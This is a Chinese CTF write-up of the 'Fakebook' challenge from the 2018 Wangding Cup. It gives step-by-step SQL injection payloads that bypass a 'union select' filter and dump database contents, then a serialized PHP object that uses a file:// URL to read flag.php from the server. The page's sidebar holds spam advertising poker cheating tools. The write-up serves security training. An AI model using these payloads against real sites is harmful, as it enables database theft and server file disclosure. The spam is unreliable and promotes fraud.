[网鼎杯 2018]Fakebook1
创始人
2024-11-13 07:35:42
0

打开题目

先创建用户,登录试试

观察网址,这是一道注入的题目

测试注入列数
说明注入列数为4

测试注入点
union select 被过滤

替代?no=0 union all select 1,2,3, 4 %23

2是注入点

爆数据库

?no=0 union all select 1,group_concat(schema_name),3, 4 from
information_schema.schemata %23

爆表名

?no=0 union all select 1,group_concat(table_name),3, 4 from
information_schema.tables where table_schema=‘fakebook’ # 

爆字段

?no=0 union all select 1,group_concat(column_name),3, 4 from
information_schema.columns where table_name=‘users’ #

爆数据

?no=0 union all select 1,group_concat(data),3, 4 from fakebook.users #

构造序列化结果
data中的数据

?no=0 union all select 1,group_concat(data),3, 'O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:12;s:4:"blog";s:29:"file:///var/www/html/flag.php";}' from fakebook.users #

最后查看源码,看到base64,解码得到flag

上一篇:四分钟了解!wpk微扑克其实真的是有挂的(透视作弊)wepOKer能透视的(有挂手段)

下一篇:后表观遗传学时代如何开展DNA甲基化研究?

相关内容

热门资讯

技术分享!!德州ai智能辅助是... 技术分享!!德州ai智能辅助是什么(黑科技)外挂透视辅助工具(真实有挂)-哔哩哔哩;无聊就玩这款德州...
黑科技最新!wepoke脚本(... 黑科技最新!wepoke脚本(透视)系统教程(2025已更新)(哔哩哔哩);黑科技最新!wepoke...
黑科技实锤!红龙扑克是真正规的... 黑科技实锤!红龙扑克是真正规的(wpk最新黑科技)确实真的有挂(有挂秘笈)-哔哩哔哩1、下载好wpk...
黑科技好友房(微扑克系统机制)... 黑科技好友房(微扑克系统机制)外挂透明挂辅助神器(透视)竟然有挂(真的有挂)-哔哩哔哩;1、完成微扑...
推荐攻略!AA POKER下载... 您好,AA POKER下载软件这款游戏可以开挂的,确实是有挂的,需要了解加微【136704302】很...
黑科技苹果版!红龙扑克是正规的... 黑科技苹果版!红龙扑克是正规的吗(透视)黑科技教程(2023已更新)(哔哩哔哩)暗藏猫腻,小编详细说...
黑科技规律!governoro... 1、黑科技规律!governorofpoker3有挂(线上wpk德州ai机器人)从前存在有挂(有挂细...
黑科技脚本(aapoker是什... 黑科技脚本(aapoker是什么软件)外挂透明挂辅助挂(透视)果然存在有挂(有挂讲解)-哔哩哔哩1、...
必备科技!微扑克专用辅助器(黑... 必备科技!微扑克专用辅助器(黑科技)外挂黑科技ai辅助黑科技(有挂详情)-哔哩哔哩1、不需要AI权限...
黑科技最新!微扑克真的有辅助吗... 黑科技最新!微扑克真的有辅助吗(透视)大神讲解(2020已更新)(哔哩哔哩)1、下载好微扑克真的有辅...